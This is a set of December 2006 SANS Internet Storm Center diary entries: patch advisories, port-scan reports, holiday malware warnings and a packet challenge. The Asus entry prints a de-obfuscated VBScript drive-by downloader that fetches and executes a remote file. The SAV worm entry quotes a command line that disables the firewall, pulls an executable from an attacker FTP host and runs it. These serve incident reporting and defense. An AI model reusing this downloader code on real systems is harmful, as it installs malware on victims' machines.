If there's a new computer under your Christmas tree this morning, please be sure to secure your shiny new toy before you start cruising the Internet or downloading free software.  Likewise, if mom and dad, or brother, or sis, or grandma and grandpa, or your clueless nextdoor neighbor (who still has his SSID set to DEFAULT after years of warning) received a new computer-thingy, please take a moment when you call or visit on Christmas Day to make sure that they know how to install patches, configure their firewall, and know how to keep their antivirus software up to date.  Everybody else on the Internet will really appreciate your efforts!!!  Oh, and fix that access point while you are at it.

From all of us here at the Internet Storm Center, thanks to you - our faithful readers - for another year of support and friendship!  Without you we would just be a bunch of incident handlers with nothing to handle.

We hope you have a wonderful holiday season and keep those DShield logs coming.  We want packets for Christmas!

Marcus H. Sachs
Director, SANS Internet Storm Center


Published: 2006-12-24

'Twas the night before Christmas, when all through the house Not a creature was stirring, not even a mouse.

Maybe no mice, but if the internet is on, plenty of things are flowing.

First, reports of a few million break and enter in Australia, New Zealand and some of the pacific Islands, possibly related to the unauthorised air traffic in the same regions.  Also wanted for littering (not collecting animal droppings).

On a packet note:  
Cheat Trojan

Robert reported that a friend downloaded a Battlefield cheat which proceeded to infect his system. We'll be having a look at that one. 

Gordon has reported that he is seeing some packets with flags (CWR ECE) set, going towards webmin ports. There was a new release back on the 28th of November, but currently no reported vulnerabilities.

Port 855/2967
Port 8555 and 2967 activity has tapered off (for the moment).  This specific instance we were looking at looks like a variation of  the SAV activity of recent weeks.  If your corporate AV is not yet up to date (that is software, not just patterns) then you may still be vulnerable.  The timing of this was exquisite, just the few days of the year on which corporate types would be on the net and checking emails, finishing off that last report etc.


Spam in AU has tapered off a little as well over the last day or two.  One or two readers have reported similar results in their region.  Everybody probably has already bought their, medicine, extensions, reductions, software and penny stock for the year.   Maybe with the January sales it will start ramping up again.

Happy holidays to all from the ISC



Published: 2006-12-24

Careful with the seasonal attachments!

Season greetings are all good and fine, but we must alert our respective user bases that those that don't go along with the seasonal spirit are out there to hurt us.
Any of those can and will get you in trouble. And the reliance on anti-virus software should not be too high. The powerpoint file above was detected badly at the time we got our copy of it:
Vendor Version Result
AntiVir 12.23.2006 EXP/PPT.Dropper.Gen
Authentium 4.93.8 12.22.2006 no virus found
Avast 4.7.892.0 12.21.2006 no virus found
AVG 386 12.23.2006 no virus found
BitDefender 7.2 12.23.2006 no virus found
CAT-QuickHeal 8.00 12.23.2006 no virus found
ClamAV devel-20060426 12.23.2006 no virus found
DrWeb 4.33 12.23.2006 no virus found
eSafe 12.23.2006 no virus found
eTrust-InoculateIT 23.73.97 12.23.2006 no virus found
eTrust-Vet 30.3.3271 12.23.2006 PP97M/MS06-012!exploit
Ewido 4.0 12.23.2006 no virus found
Fortinet 12.23.2006 no virus found
F-Prot 3.16f 12.22.2006 no virus found
F-Prot4 12.22.2006 no virus found
Ikarus T3.1.0.27 12.23.2006 no virus found
Kaspersky 12.23.2006 no virus found
McAfee 4925 12.22.2006 no virus found
Microsoft 1.1904 12.23.2006 no virus found
NOD32v2 1936 12.23.2006 no virus found
Norman 5.80.02 12.22.2006 no virus found
Panda 12.23.2006 no virus found
Prevx1 V2 12.23.2006 no virus found
Sophos 4.12.0 12.22.2006 no virus found
Sunbelt 2.2.907.0 12.18.2006 no virus found
TheHacker 12.20.2006 no virus found
UNA 1.83 12.22.2006 no virus found
VBA32 3.11.1 12.23.2006 no virus found

With thanks to Michael for sending in the powerpoint sample.

The abuse of the season greeting habit by the bad guys isn't somthing new. We warned about it last year (Dec 2005) already. It's still just as a valid as it was then.

Swa Frantzen -- Section 66


Published: 2006-12-24

phpBB 2.0.22 - upgrade time

phpBB had an early X-mas gift in the form of a release of phpBB 2.0.22. The release fixes a number of security issues as well as functional issues. The security issues can be summarized as:
  • Check for the avatar upload directory reinforced
  • Changes to the criteria for "bad" redirection targets
  • Fixed a non-persistent XSS issue in private messaging
  • Fixing possible negative start parameter
  • Added session checks to various forms
Considering the past exploitation of phpBB vulnerabilites, it might be best not to postpone this upgrade till after the holidays and get to it now.

Don't forget to upgrade both the files and run the script as well as applying the patch to the subSilver template in any derived template you might have.

Swa Frantzen -- Section 66


Published: 2006-12-23

Christmas . exe is making the rounds

Obviously at any holiday-ish time of the year the malware writers out there are going to package their warez in an appropriately named file.  This time it's Christmas.e x e...

A reader wrote in and pointed us to an article over on f-secure.  Check it out.

A nice quote from the article.

"We've just received a sample of something that's called CHRISTMAS.EXE. When run, this IRCBot variant will try to download various malicious executables from web servers at waiguadown.008.net and user.free.77169.net. As a decoy, it shows this Christmas-themed image... Obviously, a gift that keeps on giving. To be avoided."

It would pretty easy to write a Snort rule to catch these.  You could do it one of many ways..  Look for the DNS request, look for the GET, so...  have fun with those.  If you'd like to write in with a couple examples, feel free.

Happy Holidays all!

/** Joel Esler **/


Published: 2006-12-22

Port 8555 and 2967 activity

A reader reported an infection on one of their machines.  On investigating it further it looks like there is increased activity (quite significant increase) on ports 8555 and 2967.

2967 is used by Symantec AV (Corp edition, managed clients only).  The limited number of packets we currently have show traffic hitting the 2967 port and responding to port 8555.   Looking at the dshield information  for 8555 there is a significant increase in traffic to this port since December 20, suggesting that there may be infected machines already out there.  Port 2967 has had its ups and downs over the last few weeks, but is also increasing.

To do further analysis we need packets.  So if you have any captures relating to these ports please pass them along to us using the contact form. 

ISC Handler on Duty


Published: 2006-12-22

PoC for local elevation of privilege on Windows 2000 SP4 upwards

The Microsoft Blog notes that they are tracking a Proof of Concept exploit.  It targets the Client Server Run-Time Subsystem.  The blog states that initial indications are that you need to be authenticated before you can take advantage of it.  It affects Windows 2000 SP4, Windows Server 2003 SP1, Windows XP SP1, Windows XP SP2 and Windows Vista.

If you have more info feel free to drop us a packet or two.
eEye has some information has some additional info on the exploit here.

ISC Handler on Duty


Published: 2006-12-22

Challenge Update

The packet challenge is going well, with people in alternate time zones favoured or those of us that have no life, sorry I meant to say work late.

The first correct response was received by Morgan (wd), smartly followed by Mike and Kenny and his colleague M.

Check the list twice as this little Santa got the order wrong initially and that seems to be a common thing.




Challenge Link


Published: 2006-12-22

All I want for christmas are my exploits....

Not really, but it seems like that is what we are all getting.  It has definately been the trend over this past year.  There have been so many exploits, zero days, month of bugs, week of bugs etc. that its hard to keep track of all of them.  The Internet is literally crawling with them (yes, pun intended).  January is supposed to be the month of the Apple bugs.  Its going to be an interesting new year that's for sure.  So, here are some of the newer exploits that we are all getting for Christmas, whether we want them or not!

Oracle:   There are two new exploits out for Oracle.  One lets you read and write operating system files and the other is a directory traversal bug that lets you execute arbitrary commands.  With both of these, the attacker runs with the privileges of the RDBMS user.

Intel 2200BG:  (Intel 2200 driver version This vulnerability uses a malformed beacon frame that can corrupt internal kernel structures and allow for arbitrary code execution.

These are in addition to the other vulnerabilties that we have already covered.  So before you take off for the holidays, if you aren't using something or no one will need a particular service while your gone, it might be a good idea to block it or turn it off.


Published: 2006-12-21

The Twelve Days of Christmas Packet Challenge

I've had many requests for more packet challenges.  Its great to see folks enjoying themselves and looking at packets!!   In the spirit of the holiday season, I have a gift for every who enjoys packets. 

Everyone should know the song "The twelve days of Christmas."  Which goes "On the first day of christmas, my true love gave to me a partriage in a pear tree.  On the second day of christmas, ........"  (be glad you can't hear me singing it:>)  I have crafted 12 packets.  In the data portion these packets, you will find obfuscated data that will tell you what you can get from the handlers this holiday season.  They were written in the context of being an incident handler.  I'm not meaning that we want to send bad things your way:>)  Your challenge is to decode the data AND to order them in the correct order that the gifts should be received.  The packets will tell you the correct ordering of the days if you spend some looking at them.  I had alot of fun creating this challenge and I hope that everyone enjoys solving the puzzle.  You can download the packets here.   

I'll post the solution in the future when everyone has a chance to look at the packets.  Good luck and send us your results when you figure it out!


Published: 2006-12-21

Multiple vulnerabilities in Symantec Veritas NetBackup

Couple of days ago (thanks Melvin for reminding us about this) Symantec, together with ZDI, published an advisory about 3 new vulnerabilities in Veritas NetBackup server application. The vulnerability allows an attacker to remotely execute arbitrary code on a vulnerable installation.

In their advisory Symantec states that if Veritas NetBackup is properly configured that authentication will be required in order to exploit these vulnerabilities. They also state that connections should be accepted only from trusted hosts – that is if you can trust your internal network. We also don't doubt that there are a lot of servers that do not require authentication of clients which makes them even more exposed to this.

The following versions of Veritas NetBackup are vulnerable:

Veritas NetBackup 6.0 < MP4
Veritas NetBackup 5.1 < MP6
Veritas NetBackup 5.0 < MP7

If you are affected, we would recommend that you visit the following web page: http://securityresponse.symantec.com/avcenter/security/Content/2006.12.13a.html, where you can find the links to maintenance packs that patch this.

Looking at the original advisories by ZDI, it looks like they reported these vulnerabilities back in August to Symantec. This timing of releasing the patch for a remotely exploitable vulnerability just a week before the Christmas break is a bit weird – this should have been done much earlier to give people the possibility of testing this business critical feature in everyone's organization. The last thing people want is to find out that their backup was not successful (or even worse - it was successful but the server has been compromised) when they return back to work after a nice Xmas break.
The only good thing is that, at this point in time, there seem to be no exploit for these vulnerabilities in the wild.


Published: 2006-12-20

Sun JDK 5.0 Update 10

Roseman wrote to tell us that a new update for Sun JDK 5.0 has been released. Amongst a variety of bugs that have been fixed (and some of which seem to be ancient - check bug 4744057; "Potential deadlock between Selector and SelectableChannel", submitted in 2002!), one thing that caught my eye is the bug 6437047.

This "bug" was present with previous versions of Sun's JDK and is related to the Java plugin for Internet Explorer. Previous versions of the JDK were not properly signed which means that they were listed as (Not verified) in Internet Explorer (you can check this by opening the Manage add-ons tools in Internet Explorer: Tools -> Manage Add-ons -> Enable or Disable Add-ons).
This didn't prevent JDK from working, but definitely isn't best practice in security, where we're trying to educate our users to deny any non signed applets/applications/components. Sun finally fixed this (signed the plugin properly) so now the "(Not verified)"  warning is not there any more.

As JDK has automatic updates this should pop up on your machine some time soon (by default, if I'm not wrong, it will check for new updates only once per month). Once you install the new update version, and are happy with it, remember that Sun has a weird habit of *not* removing older versions from your machine, so you might want to do that manually.

New update is available from http://java.sun.com/javase/downloads/index_jdk5.jsp.


Published: 2006-12-19


This newly released security update from Apple has nothing whatsoever to do with the recent "QuickSpace" worm.  It fixes a relatively obscure issue with QuickTime for Java and Quartz Composer.

Nothing to see here... move along.


Published: 2006-12-19

FF/TB Updates

A slew of security fixes are being rolled out for FireFox and Thunderbird.  The patches, which will take FireFox to version or and Thunderbird to fix critical security flaws such as XSS (cross-site scripting) issues, privacy leaks when retrieving RSS feeds, a flaw in SVG / DOM handling, and a cursor image overflow in FireFox.  Thunderbird gets fixes for a mail header overflow and inherits several of the FF fixes as well.  As I write this, the new code doesn't appear to be available, but expect the auto-update feature to kick in soon...

More info: http://www.mozilla.org/security/


The links are now live and you can download this manually, but the auto-update feature is not there yet. Here's the list of security fixes in Firefox version

XSS using outer window's Function object
RSS Feed-preview referrer leak
Mozilla SVG Processing Remote Code Execution
XSS by setting img.src to javascript: URI
LiveConnect crash finalizing JS objects
Privilege escallation using watch point
CSS cursor image buffer overflow (Windows only)
Crashes with evidence of memory corruption (rv:


Published: 2006-12-19

It's baaaaaaaack...

The on-again-off-again update for Microsoft Office 2004 for Mac 11.3.2 is... well... on again.  There are, however, several more hours in the day, and who knows... they might change their mind again.

Get it while you can: http://www.microsoft.com/mac/downloads.aspx#Office2004


Published: 2006-12-19

A cavity in Linux Bluetooth?

Looks like there is an issue with over-filling a cavity (buffer) in the Linux Bluetooth stack's cmtp_recv_interopmsg() function.  At the very least, it's a DoS condition, but it might be possible to leverage into running code using malformed CAPI messages with oversized (1) manu (manufacturer) or (2) serial (serial number) fields.  The issue exists in Linux kernels before and in 2.6.x up to  More information can be found here.


Published: 2006-12-19

Skype 'worm' whinnies...

It appears that the possible Skype "worm" that we reported on yesterday is actually more of a Trojan Horse.  It does not appear to exploit Skype in any way, it works in accordance with the Skype API, and requires end user confirmation (i.e. "click here to run a cool program" kinda thing...). More info from the fine folks at Websense here.


Published: 2006-12-19

Soap Boxing

As we round out yet another year, I thought that I would take the opportunity to climb up on a soapbox and rant about something that has been bothering me for a bit:

We're ending 2006 much as it began: with an in-the-wild, un-patched live-data vulnerability in a widely used Windows application (for those of you with short memories, it was the WMF flaw in IE at the end of 2005, and we have three -- count 'em three -- un-patched Word flaws hanging over our heads now).

But, if you're expecting me to launch into an anti-Microsoft screed, you're about to be sorely disappointed.  Redmond represents far too easy a target at this point, and besides, I've really been trying to make it onto Uncle Bill's "Nice" list before the 25th rolls around.  The dude has over a billion dollars, so you know he's gotta give some primo stocking stuffers…

Back in my days as a True BOFH for a mid-range electronics company, I was constantly amazed at the whacky stuff that would come winging into my company via email.  And no, I'm not talking about spam, chain-emails, or dozens of copies of Mrs. Field's cookie recipes… I'm talking about legitimate business communication that was sent in the stupidest possible format.

We had one supplier who sent out a bi-weekly commodity price level update as an Excel spreadsheet… a header row with a single data row, eight columns wide, 39k.  Eight frickin' numbers!  Another supplier sent in a letter detailing their holiday shutdown as a 675k+ Word file just to communicate two paragraphs of text.

The following is a rough transcript of a phone conversation that I had with the IT department for one of our customers:

Me: "We've suddenly started receiving Excel files from your company"
Them:  "Oh, yes.  Those are part of our new ERP system.  We're quite excited about it."
Me: "Really?  Well, have you taken a close look at the files you're sending out?"
Them: "What do you mean?"
Me: "I think that you're probably sending out a bit more information than you probably should."
Them: "Well, the ERP system generates and emails out the files for us."
Me: "Ok... I'm sure that's handy, but... you see… the Excel file that we received was 3.7 MB… and it only contained one visible line."
Them: "Yes.  That's the information for your company.  You need to fill in the forecast data and send it back."
Me: "But did anyone there ever wonder why it takes 3.7 MB for one line of data?"
Them: "What do you mean?"
Me: "Well… while there is only one VISIBLE line, all of the data for all of your other vendors is still in the file.  Part numbers, prices, contact information… everything."
Them: "No, that's impossible.  The ERP system generates those files."

Their buyer often wondered how we were able to send him proposals barely undercutting our competition on several other parts.  I would have explained it to him, but… well… how it happened was "impossible".

The point?

Business on the whole has gotten sloppy about how we choose to transport data.  We've become so enamored with logos and company letterhead, ERP systems and dancing gerbils in our emails that we've forgotten that networks are about communicating, not about glitz.  If I see one more Excel spreadsheet used to transport photos and text, I'll scream.

There's a reason that the email system was designed to transport text… email is about TEXT.  Granted, there are times that you need to send binary stuff, but on the whole, that should be the exception, rather than the rule… and we certainly shouldn't be going out of our way to make up whole new ways of formatting the data we transport just so we can shove our company logo out on every message we generate.

Binary formatted data carries with it the possibility that a flaw in the associated application can be used as an avenue for compromise.  Using formatted files for the likes of Word, Excel, Powerpoint, etc... when they aren't necessary, increases our vulnerability to attack.  Educating users to be cautious about the dangers of "0-day" Word flaws is far more difficult when every other email you get contains a Word document.  Additionally, binary formatted data often carries with it far more "other" information than you might think... deleted sections, comments, user information, etc...

Start the New Year off right: take a look around your organization and see if your users are doing stupid stuff.  In a time when we should all be looking closely at any Word documents that we get, how many of the .DOC files that your company sends or receives could simply be communicated as text? 

I strongly believe that 2006 will be seen as a turning point in security: the year when application-based, live-data attacks began to flourish.  Get ahead of the game and take a cold, hard look at the avenues for data-borne attacks against your organization.  Wean your users from un-necessary reliance on formatted data when plain-old text will do.

Remember: when Moses came down off the mountain, it was with text chiseled into stone; not DHTML, JavaScript, and animated GIFs. 

If text is good enough for God, then it's good enough for you.  ;-)

Tom Liston - Intelguardians
Handler on Duty


Published: 2006-12-18

Skype worm

We are hearing some details of a new worm spreading via Skype IM, it appears to be using a custom (or at least unusual) packer and the network traffic appears encrypted as well. Please send us any info you might have on it.


Published: 2006-12-18

4242/TCP Activity is up

We've heard reports of lots of activity on port 4242/TCP recently. Is anyone else seeing this trend? If so when did you start seeing it and have you looked into its source or cause?


Published: 2006-12-18

ORDB Shutting down

the Open Relay DataBase announced today that they will be shutting down
Please don't send us rants on whether you loved or hated the ORDB, we have an automated tool for doing that. HOWEVER, if you are a mail admin and you have been using their database for your blocklist, you'll want to stop doing so. To quote the site:
" DNS and the mailing lists will vanish today, December 18, 2006. This website will vanish by December 31, 2006."


Published: 2006-12-17

Ping floods at multiple sites

    We're seeing reports of ongoing ping floods at multiple sites.  They appear to be getting low tens of thousands of echo requests (60 byte packets, no payload) per minute.
    If you're seeing a similar packet flow, please let us know.  In particular, we'd like to get a sense of how many source IP's appear to be generating the traffic and a packet capture of a few of the packets.

Update: The original poster has reported that the original reporting sites have seen traffic fall off.  At this point we don't have conclusions about what was happening, but at least it appears to have been a focused attack.  Thanks to the people who wrote in with data and suggestions for interpretation.


Published: 2006-12-16

Virus spreads from Asus Server

Robert has shared with us on a report that indicates drive-by-downloads injected in Asus pages:

This is definitely not the first such cases. Websites that are not secure are favourite sources for attackers to use them as a platform to launch attack.

Our Handler, Lenny. has de-obfuscated version of the VBScript that triggered the download:

 <script language="VBScript">
   on error resume next
   clID1  = "clsi"
   clID2  = "d:BD96C556-65A3-11D0-983A-00C04FC29E36"
   XML1 = "Mic"
   XML2 = "rosoft.XMLHTTP"
   AdoSqa1 = "Adodb.S"
   AdoSqa2 = "tream"
   oGet   = "GET"
   fname1 = "AdCount.com"
   SFO    = "Scripting.FileSystemObject"
   SApp   = "Shell.Application"
   dl     = "http://www.yyc8.com/script/src/rss3.css"
   Set df = document.createElement("object")
   df.setAttribute "classid", clID1&clID2
   Set x  =  df.CreateObject(XML1&XML2,"")
   set S  =  df.createobject(AdoSqa1&AdoSqa2,"")
   S.type = 1
   x.Open oGet, dl, False
   set F   = df.createobject(SFO,"")
   set tmp = F.GetSpecialFolder(2)
   fname1  = F.BuildPath(tmp,fname1)
   S.write x.responseBody
   S.savetofile fname1,2
   set Q  = df.createobject(SApp,"")
   Q.ShellExecute fname1,"","","open",0
   <title>Internet Explorer</title>


Published: 2006-12-16

SAV Worm Update

There is an increase on port 2967 attempts which is associated to the SAV worm for the last few days:

eEye has a nice technical write up which provide an analysis of this worm. Check it out during your free time.

Symantec has also released virus definition pertaining to this worm:


Published: 2006-12-15

Yahoo Messenger critical update

Last Friday, Yahoo published a security bulletin with respect to Yahoo Messenger in all versions prior to 2 Nov 2006 on Windows.  A buffer overflow in an ActiveX component allows for remote code execution.  Earlier today, a Secunia bulletin was also published rating this vulnerability as 'highly critical'.  Users of Yahoo Messenger are urged to update to the latest version immediately.  According to the Yahoo bulletin the CLSID that contains the fix is  AA218328-0EA8-4D70-8972-E987A9190FF4 versions 2005.1.1.4 or above

Yahoo bulletin: http://messenger.yahoo.com/security_update.php?id=120806
Secunia bulletin: http://secunia.com/advisories/23401/
Update: http://messenger.yahoo.com/


Published: 2006-12-14

sav worm and its cc

Thanks to John for this submission:

This file was being downloaded by a large number of machines that were recently exploited using the SAV remote exploit. The sequence of events for these compromises were:

Exploit comes in from IP address A (this IP varies)
Victim sends a Windows command prompt to on tcp port 12345 responds with the following:
cmd.exe /c "Net Stop SharedAccess&cd %TEMP%&echo open ftpd.3322.org 21211>x&echo test>>x&echo test>>x&echo bin>>x&echo get NL.eXe>>x&echo bye>>x&ftp.eXe -s:x&NL.eXe&del x"

Obviously, this command stops the Windows firewall service,
creates an ftp command script named "x" that is then run by ftp.exe -s:x
which downloads NL.eXe (from ftpd.3322.org 21211),
the file is then executed and then the x file is deleted.

Running the file through Virustotal gave limited information.

Complete scanning result of "NL.eXe", received in VirusTotal at 12.14.2006, 18:15:47 (CET). 
BitDefender 7.2 12.14.2006 DeepScan:Generic.Malware.IBdld!g.C9552284
CAT-QuickHeal 8.00 12.14.2006 (Suspicious) - DNAScan
eSafe 12.14.2006 Win32.Polipos.sus
 Fortinet 12.14.2006 suspicious
Ikarus T3.1.0.26 12.14.2006 Trojan-Downloader.Win32.Zlob.and
Kaspersky 12.14.2006 no virus found
Norman 5.80.02 12.14.2006 W32/Suspicious_U.gen
Panda 12.13.2006 Suspicious file
Prevx1 V2 12.14.2006 Malicious
Sophos 4.12.0 12.14.2006 Mal/Behav-009
Sunbelt 2.2.907.0 11.30.2006 VIPRE.Suspicious
 All others reported no virus found!

Aditional Information
File size: 12168 bytes
MD5: f538d2c73c7bc7ad084deb8429bd41ef
SHA1: 0eb52548a1c234cb2f8506a7c9a2e1a4547e9f8d
packers: UPACK
packers: embedded, UPack
Prevx info: http://fileinfo.prevx.com/fileinfo.asp?PXC=70e962776070
Sunbelt info: VIPRE.Suspicious is a generic detection for potential threats that are deemed suspicious through heuristics.

John, then reviewed his ids logs looking for traffic on the port 5202 which appears to be the command and control port for this malware and discovered traffic towards


Published: 2006-12-14

Port 7212 spike

A reader wrote in that he was seeing a large spike in port 7212.
I checked our port statistics and found we had had two spikes one on the 14th of November and
one on the 8th of December.
Nov 14th we saw 62k targets and 143k records with only 105 sources.
That is a 7x increase in records, a 15x increase in targets and the sources went down from the previous day.
On Dec 8th we saw 76k records against 27k targets with only 88 sources.
That is a 3x increase in records, 10x increase in targets and the sources went down from the previous day.

From the user comments on the SANS port statistics:

"There are certain older versions of GhostSurf which fire up by default as a wide-open proxy,"
Lawrence Baldwin
Write-up on ghostsurf open proxy from November 23, 2005

But based on packets provided by Daniel F. it appears to be p2p related.
Here a write-up by Daniel and packet contents.

"Earlier today a significant increase of port 7212/TCP (unknown) scanning
against relatively large segments from networks in North America,
Sweden, and France was noted.

All probes analyzed thus far appear to be associated with a Peer-to-Peer
(P2P) application framework known as
"GnucDNA" (http://www.gnucleus.com/GnucDNA/).
And two sanitized payloads:

Host: [targeted darknet address removed]:7212
User-Agent: Fildelarprogram (GnucDNA
Listen-IP: [.se host address removed]:17799
Connection: Keep-Alive
Range: bytes=0-524287
X-Queue: 0.1
X-Features: g2/1.0

Host: [targeted darknet address removed]:7212
User-Agent: morph500 (GnucDNA
Listen-IP: [.fr host address removed]:29168
Connection: Keep-Alive
Range: bytes=0-524287
X-Queue: 0.1
X-Features: g2/1.0

So I did a google for GET /uri-res/N2R?urn:sha1 guess what its all bearshare, limewire and other p2p clients.

So this spike appears to be p2p related not open proxies. But the question on my mind is why so few sources but so many targets?
After a review of the top source IPs it appears most of this is coming from within china.



Published: 2006-12-14


In response to fellow handler Swa Frantzen's call for ICMP packets yesterday, many of you sent in ICMP traces that we analyzed.  To summarize the responses, many of you are indeed seeing a general uptick in various types of ICMP traffic.  Some people are getting more echo requests, others are getting echo replies, others are getting other types of ICMP.  We haven't found any common thread between any of the submissions.  So it's probably safe for me to say that this isn't a worldwide event with a common source cause.

Some major data breaches announced at UCLA and Boeing put the total number of privacy breaches at privacyrights.org since April 2005 to almost 100 million.  http://www.privacyrights.org/ar/ChronDataBreaches.htm

New vulnerabilities announced in Symantec NetBackup:  http://www.symantec.com/avcenter/security/Content/2006.12.13a.html


Published: 2006-12-13

IBM/ISS protection suites - content update problem

IBM/ISS issued a notice for customers to NOT update to the latest version of their content update Proventia G update, XPU 1.92 library for most of their RealSecure products.  Here is the text of their alert:

"IBM Internet Security Systems has discovered a serious issue that impacts network connectivity in the content update that was released early in the morning on Dec. 13, 2006.  The following Content Updates are being recalled and withdrawn from the Download Center and from the automatic download feature of SiteProtector.  If you have already downloaded these updates, DO NOT APPLY THEM.  If you have applied these updates and can roll-back to a previous update, do so."

Affected products:
*       Proventia(r) Intrusion Prevention Appliance 1.92 (1.2 and above) or older firmware versions 24.53
*       Proventia Integrated Security Appliance 1.92
*       Proventia Intrusion Detection Appliance 24.53
*       RealSecure(r) Network Sensor 24.53
*       Proventia Server 1910 for Windows (SiteProtector SP5/6 Agent Manager Service Packs 6.76/7.76) and 1.92 for Linux
*       RealSecure Server Sensor 24.53
*       Proventia Desktop 1910 (SiteProtector(tm) SP5/6 Agent Manager Service Packs 6.76/7.76
*       RealSecure Desktop EPW (SiteProtector SP5/6 Agent Manager Service Packs 6.76/7.76

More information on the ISS knowledgebase article #3819:  https://iss.custhelp.com/cgi-bin/iss.cfg/php/enduser/std_adp.php?p_faqid=3819


Published: 2006-12-12

The missing Microsoft patches

Vulnerabilites that are widely known and/or actively exploited are of great interest to our readers, here we try to keep an overview of them

Affected Known Exploits Impact Known since
ISC rating(*)
clients servers
Office 2004 vulnerabilities (Mac version)

Unspecified vulnerabilites fixed in a accidentally released patch.
Patch has been withdrawn after being exposed to the public and replaced by a patch without the security fixes.

MSRC blog #1
MSRC blog #2
Dec 12th, 2006
Word unspecified vulnerability #3

Publicly available exploit.

MSRC blog
Remote code execution
Dec 12th, 2006
Word unspecified vulnerability #2

MSRC blog #1
MSRC blog #2
Used in targeted attacks
Remote code execution
Dec 10th, 2006
Critical Important
Word unspecified vulnerability #1

Microsoft Security Advisory 929433
MSRC blog

Used in targeted attacks
Remote code execution Dec 5th, 2006
Critical Important
RPC in Windows 2004 SP4 UPnP and SPOOLS

Multiple publicly available exploits.
Nov 16th, 2006
Less Urgent
ADODB.Connection ActiveX

MSRC blog

Publicly available exploit.
Oct 24th, 2006
Less Urgent
Less Urgent
Microsoft Windows NAT Helper Components

Publicly available exploit.
Oct 20th, 2006
Less Urgent
PowerPoint 2003

MSRC blog #1
MSRC blog #2

Publicly available exploit.
Oct 20th, 2006
Less Urgent
Less Urgent
Server Service memory corruption
Publicly available exploit.
Remote code execution?
Jul 19th, 2006
unknown unkown

We will update issues on this page as they evolve.
We appreciate updates

(*): ISC rating
  • We use 4 levels:
    • PATCH NOW: Typically used where we see immediate danger of exploitation. Typical environments will want to deploy these patches ASAP. Workarounds are typically not accepted by users or are not possible. This rating is often used when typical deployments make it vulnerable and exploits are being used or easy to obtain or make.
    • Critical: Anything that needs little to become "interesting" for the dark side. Best approach is to test and deploy ASAP. Workarounds can give more time to test.
    • Important: Things where more testing and other measures can help.
    • Less urgent: Typically we expect the impact if left unpatched to be not that big a deal in the short term. Do not forget them however.
  • The difference between the client and server rating is based on how you use the affected machine. We take into account the typical client and server deployment in the usage of the machine and the common measures people typically have in place already. Measures we presume are simple best practices for servers such as not using outlook, MSIE, word etc. to do traditional office or leaisure work.
  • The rating is not a risk analysis as such. It is a rating of importance of the vulnerability and the perceived or even predicted threat for affected systems. The rating does not account for the number of affected systems there are. It is for an affected system in a typical worst-caserole.
  • Only the organization itself is in a position to do a full risk analysis involving the presence (or lack of) affected systems, the actually implemented measures, the impact on their operation and the value of the assets involved.

Swa Frantzen -- Section 66


Published: 2006-12-12

Offline Microsoft Patching

Heise brings us "Offline Update 3.0" to do offline installations of Microsoft patches.

Read more about it at: http://www.heise-security.co.uk/articles/80682

Now this is a great concept. You can actually make a DVD to install the patches before you connect a PC (that's out of date on patches) to the Internet. If you think you can safely do that without this tool, take a second and think it through knowing that some of your friends needing a house call might have a USB connected DSL or cable modem and therefore not be using NAT, next take a look at the survival time and think how long it takes to get a windows system from original media to a fully patched status.

So, if you're going to visit parents, family or friends over the holidays, start your preparation now and make that disk today to take along. It'll improve the obligatory "Could you take a look at our computer while you're here?" response time dramatically and gives you a safe way to reinstall systems without a hardware based firewall.

If you have networks that you do not want to connect to the Internet cause the risks involved of doing that are just too big for the sensitivity of the involved data this might also become a way to patch those off-line machines.

Swa Frantzen -- Section 66


Published: 2006-12-12

SAV botnet revival ?

It seems like there is a revival going on of the botnet exploiting the Symantec Anti-Virus vulnerability. It was originally reported on by Joel on Nov 27th.

But the traffic scanning for port 2967 is back. It seems new Command and Control centers are active for it as well.

Swa Frantzen -- Section 66


Published: 2006-12-12

Microsoft Office 2004 - Mac OS X updated

Microsoft released their 11.3.1 update for Office 2004 (the Apple Mac version) today as well.

It does contain a security fix for the word component.


Swa Frantzen -- Section 66


Published: 2006-12-12

MS06-078: 2 Windows Media Format Vulnerabilities (CVE-2006-4702, CVE-2006-6134)

This advisory addresses 2 vulnerabilites in the Windows "Media Format Runtime" which is utilized by applications using Windows Media Content.
The unchecked buffer and URL parsing vulnerabilities could result in full system compromise if exploited.
An attacker would create a malicious Advanced Streaming Format (.ASF) file or a malicious Advanced Stream Redirector (.ASX) file and present it to a vulnerable client through a malicious URL, an email attachment or perhaps through a malicious IFRAME or redirect.

These vulnerabilities poses the most risk to systems which are used for web surfing or for checking email. Especially if the user is logged in as Administrator or if an unrestricted or lower than High zone Internet Explorer browser is being used. MS Outlook default restrictions might shield a user, but clicking on a URL within an email launches a browser outside of those restrictions.

Note: Known exploits have been circulating for CVE-2006-6134 (ASX).

Note that it may take several patches to update a system. Windows Media Player 6.4 is patched differently than the Media Format Runtime. It may be a challenge to assess the posture of any given system in regards to these two vulnerabilities short of utilizing the Microsoft tools.

Microsoft Windows Media Format 7.1 through 9.5 Series Runtime on the following operating system versions:
Microsoft Windows 2000 Service Pack 4 - Download the update (KB923689)
Microsoft Windows XP Service Pack 2 - Download the update (KB923689)
Microsoft Windows XP Professional x64 Edition - Download the update (KB923689)
Microsoft Windows Server 2003 or Microsoft Windows Server 2003 Service Pack 1 - Download the update (KB923689)
Microsoft Windows Server 2003 x64 Edition - Download the update (KB923689)
Microsoft Windows Media Format 9.5 Series Runtime x64 Edition on the following operating system versions:
Microsoft Windows XP Professional x64 Edition - Download the update (KB923689)
Microsoft Windows Server 2003 x64 Edition - Download the update (KB923689)
Microsoft Windows Media Player 6.4
Windows 2000 Service Pack 4 - Download the update (KB925398)
Microsoft Windows XP Service Pack 2 - Download the update (KB925398)
Microsoft Windows XP Professional x64 Edition – Download the update (KB925398)
Microsoft Windows Server 2003 or on Microsoft Windows Server 2003 Service Pack 1 – Download the update (KB925398)
Microsoft Windows Server 2003 x64 Edition – Download the update (KB925398)

Reference URLs:
Windows Media Format ASF Parsing Vulnerability
Windows Media Format ASX Parsing Vulnerability


Published: 2006-12-12

MS06-076: Windows Address Book Contact Record flaw (CVE-2006-2386)

MS06-076:  Windows Address Book Contact Record flaw  (CVE-2006-2386)

References: KB923694
Severity:  Highly Important to Workstations, lesser for servers

This update is a cumulative update for Outlook Express versions 5.5 and 6.  It addresses a remote code execution problem involving Windows Address Book (or .wab files).  The vulnerability exists in a component of Outlook Express which could allow an attacker who sends a specially crafted address book file to an unpatched system to take control of that system.  The vulnerability does not contain any privlige escalation capabilities.  If the attacker successfully exploits this vulnerability, he or she would gain the same access rights as the logged in user.  So please remember to configure end user accounts with as few of privlidges as possible.

